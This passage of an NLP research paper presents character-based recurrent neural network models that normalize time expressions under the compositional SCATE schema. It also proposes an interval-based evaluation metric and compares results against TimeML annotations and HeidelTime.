SUB-INTERVAL March DAY-OF-MONTH VALUE=6 6 Figure 1: Annotation of the expression Saturdays since March 6 following the SCATE schema. time expressions. • We develop a recurrent neural network for learn- ing SCATE-style time normalization, and show that our model outperforms the state-of-the-art HeidelTime (Strötgen et al., 2013). • We show that our character-based multi-output neural network architecture outperforms both word-based and single-output models. 2 Background ISO-TimeML (Pustejovsky et al., 2003a; Pustejovsky et al., 2010) is the most popular scheme for annotat- ing time expressions. It annotates time expressions as phrases, and assigns an ISO 8601 normalization (e.g., 1990-08-15T13:37 or PT24H) as the VALUE at- tribute of the normalized form. ISO-TimeML is used in several corpora, including the TimeBank (Puste- jovsky et al., 2003b), WikiWars (Mazur and Dale, 2010), TimeN (Llorens et al., 2012), and the Temp- Eval shared tasks (Verhagen et al., 2007; Verhagen et al., 2010; UzZaman et al., 2013). However, the ISO-TimeML schema has a few drawbacks. First, times that align to more than a single calendar unit (day, week, month, etc.), such as Saturdays since March 6 (where multiple Satur- days are involved), cannot be described in the ISO 8601 format since they do not correspond to any pre- fix of YYYY-MM-DDTHH:MM:SS. Second, each time expression receives a single VALUE, regardless of the word span, the compositional semantics of the expression are not represented. For example, in the expressions since last week and since March 6, the semantics of since are identical – find the inter- val between the anchor time (last week or March 6) and now. But ISO-TimeML would have to annotate these two phrases independently, with no way to in- dicate the shared portion of their semantics. These drawbacks of ISO-TimeML, especially the lack of compositionality, make the development of machine learning models difficult. Thus, most prior work has taken a rule-based approach, looking up each token of a time expression in a normalization lexicon and then mapping this sequence of lexical entries to the normalized form (Strötgen and Gertz, 2013; Bethard, 2013; Lee et al., 2014; Strötgen and Gertz, 2015). As an alternative to TimeML, and inspired by pre- vious works, Schilder (2004) and Han and Lavie (2004), Bethard and Parker (2016) proposed Seman- tically Compositional Annotation of Time Expres- sions (SCATE). In the SCATE schema, each time expression is annotated in terms of compositional time entity over intervals on the timeline. An ex- ample is shown in Figure 1, with every annotation corresponding to a formally defined time entity. For instance, the annotation on top of since corresponds to a BETWEEN operator that identifies an interval starting at the most recent March 6 and ending at the document creation time (DCT). The BETWEEN operator is formally defined as: BETWEEN([t1, t2): INTERVAL, [t3, t4): INTERVAL): INTERVAL = [t2, t3). The SCATE schema can represent a wide variety of time expressions, and provides a formal definition of the semantics of each annotation. Unlike TimeML, SCATE uses a graph structure to capture composi- tional semantics and can represent time expressions that are not expressed with contiguous phrases. The schema also has the advantage that it can be viewed as a semantic parsing task and, consequently, is more 344 suitable for machine-learning approaches. However, Bethard and Parker (2016) present only a corpus; they do not present any models for semantic parsing. 3 An interval-based evaluation metric for normalized times Before attempting to construct machine-learned mod- els from the SCATE corpus, we were interested in evaluating Bethard and Parker (2016)’s claim that the SCATE schema is able to represent a wider vari- ety of time expressions than TimeML. To do so, we propose a new evaluation metric to compare time nor- malizations annotated in both the ISO 8601 format of TimeML and the time entity format of SCATE. This new evaluation interprets normalized annotations as intervals along the timeline and measures the overlap of the intervals. TimeML TIMEX3 (time expression) annotations are converted to intervals following ISO 8601 se- mantics of their VALUE attribute. So, for example, 1989-03-05 is converted to the interval [1989-03- 05T00:00:00, 1989-03-06T00:00:00), that is, the 24- hour period starting at the first second of the day on 1989-03-05 and ending just before the first second of the day on 1989-03-06. SCATE annotations are con- verted to intervals following the formal semantics of each entity, using the library provided by Bethard and Parker (2016). So, for example, Next(Year(1985), SimplePeriod(YEARS, 3)), the 3 years following 1985, is converted to [1986-01-01T00:00, 1989-01- 01T00:00). Note that there may be more than one interval associated with a single annotation, as in the Saturdays since March 6 example. Once all anno- tations have been converted into intervals along the timeline, we can measure how much the intervals of different annotations overlap. Given two sets of intervals, we define the interval precision, Pint, as the total length of the intervals in common between the two sets, divided by the total length of the intervals in the first set. Interval recall, Rint is defined as the total length of the intervals in common between the two sets, divided by the total length of the intervals in the second set. Formally: IS ⋂ IH = {i∩ j : i ∈ IS ∧ j ∈ IH} Pint(IS, IH) = ∑ i∈COMPACT(IS ⋂ IH) |i| ∑ i∈IS |i| Rint(IS, IH) = ∑ i∈COMPACT(IS ⋂ IH) |i| ∑ i∈∪IH |i| where IS and IH are sets of intervals, i∩j is possibly the empty interval in common between the intervals i and j, |i| is the length of the interval i, and COMPACT takes a set of intervals and merges any overlapping intervals. Given two sets of annotations (e.g., one each from two time normalization systems), we define the over- all precision, P , as the average of interval precisions where each annotation from the first set is paired with all annotations that textually overlap it in the second set. Overall recall is defined as the average of interval recalls where each annotation from the second set is paired with all annotations that textually overlap it in the first set. Formally: OIa(B) = ⋃ b∈B:OVERLAPS(a,b) INTERVALS(b) P(S, H) = 1 |S| ∑ s∈S Pint(INTERVALS(s), OIs(H)) R(S, H) = 1 |H| ∑ h∈H Rint(INTERVALS(h), OIh(S)) where S and H are sets of annotations, INTERVALS(x) gives the time intervals associ- ated with the annotation x, and OVERLAPS(a, b) decide whether the annotations a and b share at least one character of text in common. It is important to note that these metrics can be applied only to time expressions that yield bounded intervals. Time expressions that refer to intervals with undefined boundaries are out of the scope, like in “it takes just a minute” or “I work every Saturday”. 4 Data analysis 4.1 TimeML vs. SCATE Both TimeML and SCATE annotations are available on a subset of the TempEval 2013 corpus (UzZaman et al., 2013) that contains a collection of news articles from different sources, such as Wall Street Journal, 345 AQUAINT TimeBank Test Documents 10 68 20 Sentences 251 1429 339 TimeML timex3 61 499 158 SCATE entities 333 1810 461 SCATE time exp. 114 715 209 SCATE bounded 67 403 93 Table 1: Number of documents, TimeML TIMEX3 an- notations and SCATE annotations for the subset of the TempEval 2013 corpus annotated with both schemas. AQUAINT TimeBank P R F1 P R F1 Body text 92.2 92.2 92.2 82.4 83.0 82.7 All text 92.2 67.1 77.7 82.4 71.2 76.4 Table 2: Comparison of TimeML and SCATE annotations. New York Times, Cable News Network, and Voices of America. Table 1 shows the statistics of the data. Documents from the AQUAINT and TimeBank form the training and development dataset. The SCATE corpus contains 2604 time entities (individual com- ponents of a time expression, such as every, month, last, Monday, etc.) annotated in the train+dev set (i.e. AQUAINT+TimeBank). These entities compose a total of 1038 time expressions (every month, last Monday, etc.) of which 580 yield bounded intervals, i.e. intervals with a specified start and ending (last Monday is bounded, while every month is not). We apply the interval-based evaluation metric in- troduced in Section 3 to the AQUAINT and Time- Bank datasets, treating the TimeML annotations as the system (S) annotator and the SCATE annotations as the human (H) annotator. Table 2 shows that the SCATE annotations cover different time intervals than the TimeML annotations. In the first row, we see that TimeML has a recall of only 92% of the time in- tervals identified by SCATE in the AQUAINT corpus and of only 83% in the TimeBank corpus. We manu- ally analyzed all places where TimeML and SCATE annotations differed and found that the SCATE inter- pretation was always the correct one. For example, a common case where TimeML and SCATE annotations overlap, but are not identical, is time expressions preceded by a preposition like “since”. The TimeML annotation for “Since 1985” (with a DCT of 1998-03-01T14:11) only covers the year, “1985”, resulting in the time interval [1985- 01-01T00:00,1986-01-01T00:00). The SCATE an- notation represents the full expression and, conse- quently, produces the correct time interval [1986-01- 01T00:00,1998-03-01T14:11). Another common case of disagreement is where TimeML failed to compose all pieces of a complex expression. The TimeML annotation for “10:35 a.m. (0735 GMT) Friday” annotates two separate inter- vals, the time and the day (and ignores “0735 GMT” entirely). The SCATE annotation recognizes this as a description of a single time interval, [1998-08- 07T10:35, 1998-08-07T10:36). TimeML and SCATE annotations also differ in how references to particular past periods are inter- preted. For example, TimeML assumes that “last year” and “a year ago” have identical semantics, re- ferring to the most recent calendar year, e.g., if the DCT is 1998-03-04, then they both refer to the inter- val [1997-01-01T00:00,1998-01-01T00:00). SCATE has the same semantics for “last year”, but recog- nizes that “a year ago” has different semantics: a period centered at one year prior to the DCT. Under SCATE, “a year ago” refers to the interval [1996-09- 03T00:00,1997-09-03T00:00). Beyond these differences in interpretation, we also observed that, while the SCATE corpus annotates time expressions anywhere in the document (includ- ing in metadata), the TimeBank TIMEX3 annotations are restricted to the main text of the documents. The second row of Table 2 shows the evaluation when comparing overall text in the document, not just the body text. Unsurprisingly, TimeML has a lower re- call of the time intervals from the SCATE annotations under this evaluation. 4.2 Types of SCATE annotations Studying the training and development portion of the dataset, we noticed that the SCATE annotations can be usefully divided into three categories: non- operators, explicit operators, and implicit operators. We define non-operators as NUMBERs, PERIODs (e.g., three months), explicit intervals (e.g., YEARs like 1989), and repeating intervals (DAY-OF-WEEKs like Friday, MONTH-OF-YEARs like January, etc.). Non-operators are basically atomic; they can be in- 346 Non-Op Exp-Op Imp-Op Total 1497 305 219 2021 74% 15% 11% 100% Table 3: Distribution of time entity annotations in AQUAINT+TimeBank. terpreted without having to refer to other annotations. Operators are not atomic; they can only be interpreted with respect to other annotations they link to. For example, the THIS operator in Figure 1 can only be interpreted by first interpreting the DAY-OF-WEEK non-operator and the BETWEEN operator that it links to. We split operators into two types: explicit and implicit. We define an operator as explicit if it does not overlap with any other annotation. This occurs, for example, when the time connective since evokes the BETWEEN operator in Figure 1. An operator is considered to be implicit if it overlaps with an- other annotation. This occurs, for example, with the LAST operator in Figure 1, where March implies last March, but there is no explicit signal in the text, and it must be inferred from context. We study how these annotation groups distribute in the AQUAINT and TimeBank documents. Table 3 shows that non-operators are much more frequent than operators (both explicit and implicit). 5 Models We decompose the normalization of time expressions into two subtasks: a) time entity identification which detects the spans of characters that belong to each time expression and labels them with their corre- sponding time entity; and b) time entity composition that links relevant entities together while respecting the entity type constraints imposed by the SCATE schema. These two tasks are run sequentially using the output of the former as input to the latter. Once identification and composition steps are completed we can use the final product, i.e. semantic composi- tional of time entities, to feed the SCATE interpreter1 and encode time intervals. 5.1 Time entity identification Time entity identification is a type of sequence tag- ging task where each piece of a time expression is 1https://github.com/clulab/timenorm assigned a label that identifies the time entity that it evokes. We express such labels using the BIO tagging system, where B stands for the beginning of an annotation, I for the inside, and O for outside any annotation. Differing somewhat from standard sequence tagging tasks, the SCATE schema allows multiple annotations over the same span of text (e.g., “Saturdays” in Figure 1 is both a DAY-OF-WEEK and a THIS), so entity identification models must be able to handle such multi-label classification. 5.1.1 Neural architectures Recurrent neural networks (RNN) are the state- of-the-art on sequence tagging tasks (Lample et al., 2016a; Graves et al., 2013; Plank et al., 2016) thanks to their ability to maintain a memory of the sequence as they read it and make predictions conditioned on long distance features, so we also adopt them here. We introduce three RNN architectures that share a similar internal structure, but differ in how they repre- sent the output. They convert the input into features that feed an embedding layer. The embedded feature vectors are then fed into two stacked bidirectional Gated Recurrent Units (GRUs), and the second GRU followed by an activation function, outputs one BIO tag for each input. We select GRU for our models as they can outperform another popular recurrent unit LSTM (Long Short Term Memory), in terms of pa- rameter updates and convergence in CPU time with the same number of parameters (Chung et al., 2014). Our 1-Sigmoid model (Figure 2) approaches the task as a multi-label classification problem, with a set of sigmoids for each output that allow zero or more BIO labels to be predicted simultaneously. This is the standard way of encoding multi-label classification problems for neural networks, but in our experiments, we found that these models perform poorly since they can overproduce labels for each input, e.g., 03 could be labeled with both DAY-OF-MONTH and MONTH- OF-YEAR at the same time. Our 2-Softmax model (Figure 3) splits the out- put space of labels into two sets: non-operators and operators (as defined in Section 4.2). It is very un- likely that any piece of text will be annotated with more than one non-operator or with more than one operator,2 though it is common for text to be anno- 2In the training data, only 4 of 1217 non-operators overlap with another non-operator, and only 6 of 406 operators overlap 347 Input Feature Embed Bi-GRU Bi-GRU Sigmoid Output Non-Operators and Operators M M Lu NNP B-LAST B-MONTH a a Ll NNP I-LAST I-MONTH y y Ll NNP I-LAST I-MONTH Zs ∅ ∅ 2 2 Nd CD B-DAY 5 5 Nd CD I-DAY . . . . . . . . . . . . . . . . . . Figure 2: Architecture of the 1-Sigmoid model. The input is May 25. In SCATE-style annotation, May is a MONTH- OF-YEAR (a non-operator), with an implicit LAST (an operator) over the same span, and 25 is a DAY-OF-MONTH. At the feature layer, M is an uppercase letter (Lu), a and y are lowercase letters (Ll), space is a separator (Zs), and May is a proper noun (NNP). Input Feature Embed Bi-GRU Bi-GRU Softmax Output Non-Operators Operators M M Lu NNP B-MONTH B-LAST a a Ll NNP I-MONTH I-LAST y y Ll NNP I-MONTH I-LAST Zs ∅ O O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Figure 3: Architecture of the 2-Softmax model. The input is May. The SCATE annotations and features are the same as in Figure 2. tated with one non-operator and one operator (see Figure 1). As a result, we can use two softmaxes, one for non-operators and one for operators, and the 2- Softmax model thus can produce 0, 1, or 2 labels per input. We share input and embedding layers, but as- sociate a separate set of stacked Bi-GRUs with each output category, as shown in Figure 3.3 Our 3-Softmax further splits operators into explicit operators and implicit operators (again, as defined with another operator. For example, a NYT said in an editorial on Saturday, April 25, Saturday is labeled as [DAY-OF-WEEK, LAST, INTERSECTION] where the last two labels are operators. 3In preliminary experiments, we tried sharing GRU layers as well, but this generally resulted in worse performance. in Section 4.2). We expect this to help the model since the learning task is very different for these two cases: with explicit operators, the model just has to memorize which phrases evoke which operators, while with implicit operators, the model has to learn to infer an operator from context (verb tense, etc.). We use three softmaxes, one each for non-operators, explicit operators, and implicit operators, and, as with 2-Softmax, we share input and embedding layers, but associate a separate set of stacked Bi-GRUs with each output category. The model looks similar to Figure 3, but with three output groups instead of two. We feed three features as input to the RNNs: Text: The input word itself for the word-by-word 348 model, or a the single input character for the character-by-character model. Unicode character categories: The category of each character as defined by the Unicode standard.4 This encodes information like the presence of upper- case (Lu) or lowercase (Ll) letters, punctuation (Po), digits (Nd), etc. For the word-by-word model, we concatenate the character categories of all characters in the word (e.g., May becomes LULLLL). Part-of-speech: The part-of-speech as determined by the Stanford POS tagger (Toutanova et al., 2003). We expect this to be useful for, e.g., finding verb tense to help distinguish between implicit LAST and NEXT operators. For the character-by-character model, we repeat the word-level part-of-speech tag for each char- acter in the word, and characters with no part-of- speech (e.g., spaces) get no tag. 5.1.2 Input: words vs. characters Identifying SCATE-style time entity is a sequence tagging task, similar to named entity recognition (NER), so we take inspiration from recent work in neural architectures for NER. The first neural NER models followed the prior (non-neural) work in ap- proaching NER as a word classification problem, ap- plying architectures such as sliding-window feedfor- ward neural networks (Qi et al., 2009), convolutional neural networks (CNNs) with conditional random field (CRF) layers (Collobert et al., 2011), and LSTM with CRF layers and hand-crafted features (Huang et al., 2015). More recently, character-level neural net- works have also been proposed for NER, including several which combine a CNN or LSTM for learn- ing character-based representations of words with an LSTM or LSTM-CRF for word-by-word labeling (Chiu and Nichols, 2016; Lample et al., 2016b; Ma and Hovy, 2016), as well as character-by-character sequence-to-sequence networks (Gillick et al., 2016; Kuru et al., 2016). Based on these works, we consider two forms of input processing for our RNNs: word-by-word vs. character-by-character. Several aspects of the time normalization problem make the character-based ap- proach especially appealing. First, many time phrases involve numbers that must be interpreted semanti- cally (e.g., a good model should learn that months 4See http://unicode.org/notes/tn36/ cannot be a number higher than 12), and digit-by- digit processing of numbers allows such interpreta- tions, while treating each number as a word would result in a sparse, intractable learning problem. Sec- ond, word-based models assume that we know how to tokenize the text into words, but at times present challenging formats such as overnight, where over evokes a LAST operator and night is a PART-OF-DAY. Finally, character-based models can ameliorate out- of-vocabulary (OOV) words, which are a common problem when training sparse datasets. (Hybrid word- character models, such as the LSTM-CNNs-CRF (Ma and Hovy, 2016) can address this last problem, but not the previous two.) For our word-based model, we apply the NLTK Tokenizer (Bird et al., 2009) to each sentence. We further tokenize with the regular expres- sion "\d+|[ˆ\d\W]+|\S" to break apart alpha- numeric expressions like 1620EDT. However, the tokenizer is unable to break-apart expressions such as 19980206 and overnight. For our character-based model, no tokenization is applied and every character (including whitespace characters) is fed as input. 5.2 Time entity composition Once the entities of the time-expressions are identi- fied, they must be composed in order to obtain their semantic interpretation. This step of the analysis con- sists of two parts: linking the entities that make up a time-expression together and completing the entities’ properties with the proper values. For both cases, we set a simple set of rules that follow the constraints imposed by the SCATE schema5. 5.2.1 Time entity linking Algorithm 1 shows the process followed to obtain the links between the time entities. First, we define an empty stack that will store the entities belong- ing to the same time expression. Then, we iterate over the list of entities of a document sorted by their starting character offsets (SORTBYSTART). For each of these entities (entity1) and for each entity in the stack (entity2), we check if the guidelines specify a possible link (LINKISVALID) between the types of entity1 and entity2. If such a link is possible, and 5https://github.com/bethard/ anafora-annotations/blob/master/.schema/ timenorm-schema.xml 349 Algorithm 1 Linking time entities stack = ∅ for entity1 in SORTBYSTART(entities) do if START(entity1) - END(stack) > 10 then stack = ∅ end if for entity2 in stack do if LINKISVALID(entity1, entity2) then CREATELINK(entity1, entity2) end if end for PUSH(stack, entity1) end for it has not already been filled by another annotation, we greedily make the link (CREATELINK). When the distance in the number of characters between the entity and the end of the stack is bigger than 10, we assume that the entities do not belong to the time expression. Thus, we empty the stack.6 For example, our time entity identification model gets the YEAR, MONTH-OF-YEAR and DAY-OF- MONTH for the time-expression 1992-12-23. Our time entity composition algorithm then iterates over these entities. At the beginning the stack is empty, it just pushes the entity 1992 (YEAR) into the stack. For the entity 12 (MONTH-OF-YEAR) it checks if the guidelines define a possible link between this en- tity type and the one currently in the stack (YEAR). In this case, the guidelines establish that a YEAR can have a SUB-INTERVAL link to a SEASON-OF- YEAR, a MONTH-OF-YEAR or WEEK-OF-YEAR. Thus, the algorithm creates a SUB-INTERVAL link between 1992 and 12. The entity 12 is then pushed into the stack. This process is repeated for the en- tity 23 (DAY-OF-MONTH) checking if there was a possible link to the entities in the stack (1992, 12). The guidelines define a possible SUB-INTERVAL link between MONTH-OF-YEAR and DAY-OF-MONTH, so a link is created here as well. Now, suppose that the following time entity in the list is several words ahead of 23 so the character distance between both entities is larger than 10. If that is the case the stack is empty and the process starts again to compose a new time expression. 6The distance threshold was selected based on the perfor- mance on the development dataset. 5.2.2 Property completion The last step is to associate each time entity of a time-expression with a set of properties that include information needed for its interpretation. Our system decides the value of these properties as follows: TYPE: The SCATE schema defines that some enti- ties can only have specific values. For example, a SEASON-OF-YEAR can only be SPRING, SUMMER, FALL or WINTER, a MONTH-OF-YEAR can only be JANUARY, FEBRUARY, MARCH, etc. To complete this property we take the text span of the time en- tity and normalize it to the values accepted in the schema. For example, if the span of a MONTH-OF- YEAR entity was the numeric value 01 we would normalize it to JANUARY, if its span was Sep. we would normalize it to SEPTEMBER, and so on. VALUE: This property contains the value of a nu- merical entity, like DAY-OF-MONTH or HOUR-OF- DAY.To complete it, we just take the text span of the entity and convert it to an integer. If it is written in words instead of digits (e.g., nineteen instead of 19), we apply a simple grammar7 to convert to an integer. SEMANTICS: In news-style texts, it is common that expressions like last Friday, when the DCT is a Fri- day, refer to the day as the DCT instead of the previ- ous occurrence (as it would in more standard usage of last). SCATE indicates this with the SEMANTICS property, where the value INTERVAL-INCLUDED in- dicates that the current interval is included when calculating the last or next occurrence. For the rest of the cases the value INTERVAL-NOT-INCLUDED is used. In our system, when a LAST operator is found, if it is linked to a DAY-OF-WEEK (e.g. Friday) that matches the DCT, we set the value of this property to INTERVAL-INCLUDED. INTERVAL-TYPE: Operators like NEXT or LAST need an interval as reference in order to be interpreted. Normally, this reference is the DCT. For example, next week refers to the week following the DCT, and in such a case the value of the property INTERVAL- TYPE for the operator NEXT would be DOCTIME. However, sometimes the operator is linked to an in- terval that serves as reference by itself, for example, “by the year 2000”. In this cases the value of the INTERVAL-TYPE is LINK. Our system sets the value 7https://github.com/ghewgill/text2num 350 of this property to LINK if the operator is linked to a YEAR and DOCTIME otherwise. This is a very coarse heuristic; finding the proper anchor for a time expression is a challenging open problem for which future research is needed. 5.3 Automatically generated training data Every document in the dataset starts with a document creation time. These time expressions are quite partic- ular; they occur in isolation and not within the context of a sentence and they always yield a bounded inter- val. Thus their identification is a critical factor in an interval based evaluation metric. However, document times appear in many different formats: ”Monday, July-24, 2017”, ”07/24/17 09:52 AM”, ”08-15-17 1337 PM”, etc. Many of these formats are not cov- ered in the training data, which is drawn from a small number of news sources, each of which uses only a single format. We therefore designed a time gen- erator to randomly generate an extra 800 isolated training examples for a wide variety of such expres- sion formats. The generator covers 33 different for- mats8 which include variants covering abbreviation, with/without delimiters, mixture of digits and strings, and different sequences of time units. 6 Experiments We train and evaluate our models on the SCATE cor- pus described in Section 4. As a development dataset, 14 documents are taken as a random stratified sample from the TempEval 2013 (TimeBank + AQUAINT) portion shown in Table 1, including broadcast news documents (1 ABC, 1 CNN, 1 PRI, 1 VOA), and newswire documents (5 AP, 1 NYT, 4 WSJ). We use the interval-based evaluation metric described in Sec- tion 3, but also report more traditional information extraction metrics (precision, recall, and F1) for the time entity identification and composition steps. Let S be the set of items predicted by the system and H is the set of items produced by the humans, precision (P ), recall (R), and F1 are defined as: P(S, H) = |S ∩H| |S| R(S, H) = |S ∩H| |H| 8We use the common formats available in office suites, specif- ically, LibreOffice. F1(S, H) = 2 ·P(S, H) ·R(S, H) P(S, H) + R(S, H) . For these calculations, each item is an annotation, and one annotation is considered equal to another if it has the same character span (offsets), type, and properties (with the definition applying recursively for properties that point to other annotations). To make the experiments with different neural ar- chitectures comparable, we tuned the parameters of all models to achieve the best performance on the development data. Due to space constraints, we only list here the hyper-parameters for our best Char 3- Softmax: the embedding size of the character-level text, word-level text, POS tag, and unicode character category features are 128, 300, 32 and 64, respec- tively. To avoid overfitting, we used dropout with probabilities 0.25, 0.15 and 0.15 for the 3 features, respectively; the sizes of the first and second layer GRU units are set as 256 and 150. We trained the model with RMSProp optimization on mini-batches of size 120, and followed standard recommendations to leave the optimizer hyperparameter settings at their default values. Each model is trained for at most 800 epochs, the longest training time for Char 3-Softmax model is around 22 hours using 2x NVIDIA Kepler K20X GPU. 6.1 Model selection We compare the different time entity identification models described in Section 5.1, training them on the training data, and evaluating them on the develop- ment data. Among the epochs of each model, we se- lect the epoch based on the output(s) which the model is good at predicting because based on its weakness, the model would yield unstable results in our pre- liminary experiments. For example, for 3-Softmax models, our selections rely on the performances of non-operators and implicit-operators. Table 4 shows the results of the development phase. First, we find that the character-based models out- perform the word-based models.9 For example, the best character-based model achieves the F1 of 81.7 (Char 3-Softmax),which is significantly better than the best word-based model achieving the F1 of only 9We briefly explored using pre-trained word embeddings to try to improve the performance of the Word 1-Sigmoid model, but it yielded a performance that was still worse than the character-based model, so we didn’t explore it further. 351 Model P R F1 Word 1-Sigmoid 60.2 52.0 55.8 Char 1-Sigmoid 54.0 59.0 56.4 Word 2-Softmax 58.7 63.9 61.2 Char 2-Softmax 74.8 72.4 73.6 Word 3-Softmax 68.3 64.9 66.6 Char 3-Softmax 88.2 76.1 81.7 Char 3-Softmax extra 80.6 73.4 76.8 Table 4: Precision (P ), recall (R), and F1 for the different neural network architectures on Time entity identification on the development data. 66.6 (p=0).10 Second, we find that Softmax mod- els outperform Sigmoid models. For example, the Char 3-Softmax model achives the F1 of 81.7, sig- nificantly better than 56.4 F1 of the Char 1-Sigmoid model (p=0). Third, for both character- and word- based models, we find that 3-Softmax significantly outperforms 2-Softmax: the Char 3-Softmax F1 of 81.7 is better than the Char 2-Softmax F1 of 73.6 (p=0) and the Word 3-Softmax F1 of 66.6 is bet- ter than the Word 2-Softmax F1 of 61.2 (p=0.0254). Additionally, we find that all models are better at identifying non-operators than operators and that the explicit operators are the hardest to solve. For ex- ample, the Char 3-Softmax model gets 92.4 F1 for non-operators, 36.1 F1 for explicit operators and 79.1 F1 for implicit operators. Finally, we also train the best model, Char 3-Softmax, using the generated an- notations described in Section 5.3 and achieve 76.8 F1 (Char 3-Softmax extra), i.e., the model performs better without the extra data (p=0). This is probably a result of overfitting due to the small variety of time formats in the training and development data. From this analysis on the development set, we se- lect two variants of the Char 3-softmax architecture for evaluation on the test set: Char 3-Softmax and Char 3-Softmax extra. These models were then cou- pled with the rule-based linking system described in Section 5.2 to produce a complete SCATE-style parsing system. 6.2 Model evaluation We evaluate both Char 3-Softmax and Char 3- Softmax extra on the test set for identification and 10We used a paired bootstrap resampling significance test. Char 3-Softmax Char 3-Soft. extra P R F1 P R F1 Non-Op 79.2 63.2 70.3 87.4 63.2 73.4 Exp-Op 52.6 36.6 43.2 39.8 38.7 39.3 Imp-Op 53.3 47.1 50.0 65.4 50.0 56.7 Ident 70.0 54.5 61.3 69.4 55.3 61.5 Comp 59.7 46.5 52.3 57.7 46.0 51.2 Table 5: Results on the test set for Time entity identifi- cation (Ident) and Time entity composition (Comp) steps. For the former we report the performances for each entity set: non-operators (Non-Op), explicit operators (Exp-Op) and implicit operators (Imp-Op). Model P R F1 HeidelTime 70.9 76.8 73.7 Char 3-Softmax 73.8 62.4 67.6 Char 3-Softmax extra 82.7 71.0 76.4 Table 6: Precision (P ), recall (R), and F1 of our models on the test data producing bounded time intervals. For comparison, we include the results obtained by Heidel- Time. composition tasks. Table 5 shows the results. On the identification task, Char 3-Softmax extra is no worse than using the original dataset with the over- all F1 61.5 vs. 61.3 (p=0.5899), and using extra generated data the model is better at predicting non- operators and implicit operators with higher preci- sions (p=0.0096), which is the key to produce correct bounded time intervals. To compare our approach with the state-of-the-art, we run HeidelTime on the test documents and make use of the metric described in Section 3. This way, we can compare the intervals produced by both sys- tems no matter the annotation schema. Table 6 shows that our model with additional randomly generated training data outperforms HeidelTime in terms of Precision, with a significant difference of 12.6 per- centage points (p=0.011), while HeidelTime obtains a non-significant better performance in terms of Re- call (p=0.1826). Overall, our model gets 3.3 more percentage points than HeidelTime in terms of F1 (p=0.2485). Notice that, although the model trained without extra annotations is better in time entity com- position (see Table 5), it performs much worse at producing final intervals. This is caused by the fact 352 Model P R F1 HeidelTime 70.7 80.2 75.1 Char 3-Softmax 74.3 64.2 68.9 Char 3-Softmax extra 83.3 74.1 78.4 Table 7: Precision (P ), recall (R), and F1 on bounded intervals on the TimeML/SCATE perfect overlapping test data. that this model fails to identify the non-operators that compound dates in unseen formats (see Section 5.3). However, evaluating HeidelTime in the SCATE annotations may not be totally fair. HeidelTime was developed following the TimeML schema and, as we show in Section 4, SCATE covers a wider set of time expressions. For this reason, we perform an additional evaluation. First, we compare the annota- tions in the test set using our interval-based metric, similar to the comparison reported in Table 2, and select those cases where TimeML and SCATE match perfectly. Then, we remove the rest of the cases from the test set. Consequently, we also remove the pre- dictions given by the systems, both ours and Heidel- Time, for those instances. Finally, we run the interval scorer using the new configuration. As can be seen in Table 7 all the models improve their performances. However, our model still performs better when it is trained with the extra annotations. The SCATE interpreter that encodes the time in- tervals needs the compositional graph of a time- expression to have all its elements correct. Thus, failing in the identification of any entity of a time- expression results in totally uninterpretable graphs. For example, in the expression next year, if our model identifies year as a PERIOD instead of an INTER- VAL it cannot be linked to next because it violates the SCATE schema. The model can also fail in the recognition of some time-entities, like summer in the expression last summer. This identification errors are caused mainly by the sparse training data. As graphs containing these errors produce unsolvable logical formulae, the interpreter cannot produce intervals and hence the recall decreases. Within those inter- vals that are ultimately generated, the most common mistake is to confuse the LAST and NEXT operators, and as a result an incorrectly placed interval even with correctly identified non-operators. For example, if an October with an implicit NEXT operator is in- stead given a LAST operator, instead of referring to [2013-10-01T00:00, 2013-11-01T00:00), it will refer to [2012-10-01T00:00, 2012-11-01T00:00). Missing implicit operators is also the main source of errors for HeidelTime, which fails with complex compositional graphs. For example, that January day in 2011 is annotated by HeidelTime as two different intervals, corresponding respectively to January and 2011. As a consequence, HeidelTime predicts not one but two incorrect intervals, affecting its precision. 7 Discussion As for the time entity identification task, the per- formance differences between development and test dataset could be attributed to the annotation distri- butions of the datasets. For example, there are 10 Season-Of-Year annotations in the test set while there are no such annotations in the development dataset; the relative frequencies of the annotations Minute- Of-Hour, Hour-Of-Day, Two-Digit-Year and Time- Zone in the test set are much lower, and our models are good at predicting such annotations. Explicit operators are very lexically-dependent, e.g. LAST corresponds to one word from the set {last, latest, previously, recently, past, over, recent, earlier, the past, before}, and the majority of them appear once or twice in the training and development sets. Our experiments verify the advantages of character-based-models in predicting SCATE anno- tations, which are in agreement with our explana- tions in Section 5.1.2: word-based-models tend to fail to distinguish numbers from digit-based time ex- pressions. It’s difficult for word-based-models to catch some patterns of time expressions, such as 24th and 25th, August and Aug., etc., while character- based models are robust to such variance. We ran an experiment to see whether these benefits were unique to compositional annotations like those of SCATE, or more generally to simply recognizing time expressions. We used the TimeML annotations from AQUAINT and TimeBank (see Table 1) to train two multi-class classifiers to identify TIMEX3 an- notations. The models were similar to our Char 3- Softmax and Word 3-Softmax models, using the same parameter settings, but with a single softmax output layer to predict the four types of TIMEX3: DATE, TIME, DURATION, and SET. As shown in Table 8, 353 TIMEX3 TIMEX3-Digits P R F1 P R F1 Char 70.2 62.7 66.2 73.8 71.4 72.6 Word 81.3 69.0 74.7 86.2 79.4 82.6 Table 8: Precision (P ), recall (R), and F1 for character- based and word-based models in predicting TimeML TIMEX3 annotations on the TempEval 2013 test set. TIMEX3-Digits is the subset of annotations that contain digits. on the test set the word-based model significantly out- performs the character-based model in terms of both time expressions (p=0.0428) and the subset of time expressions that contain digits (p=0.0007). These results suggest that the reason character-based mod- els are more successful on the SCATE annotations is that SCATE breaks time expressions down into meaningful sub-components. For example, TimeML would simply call Monday, 1992-05-04 a DATE, and call 15:00:00 GMT Saturday a TIME. SCATE would identify four and five, respectively, different types of semantic entities in these expression; and each SCATE entity would be either all letters or all digits. In TimeML, the model is faced with difficult learning tasks, e.g., that sometimes a weekday name is part of a DATE and sometimes it is part of a TIME, while in SCATE, a weekday name is always a DAY-OF- WEEK. On the other hand, running the entity composition step with gold entity identification achieves 72.6 in terms of F1. One of the main causes of errors in this step is the heuristic to complete the INTERVAL-TYPE property. As we explain in Section 5.2, we implement a too coarse set of rules for this case. Another source of errors is the distance of the 10 characters we use to decide if the time entities belong to the same time expression. This condition prevents the creation of some links, for example, the expression “Later” at the beginning of a sentence typically refers to another time interval in a previous sentence, so the distance between them is much longer. 8 Conclusion We have presented the first model for time normaliza- tion trained on SCATE-style annotations. The model outperforms the rule-based state-of-the-art, proving that describing time expressions in terms of compo- sitional time entities is suitable for machine learn- ing approaches. This broadens the research in time normalization beyond the more restricted TimeML schema. We have shown that a character-based neural network architecture has advantages for 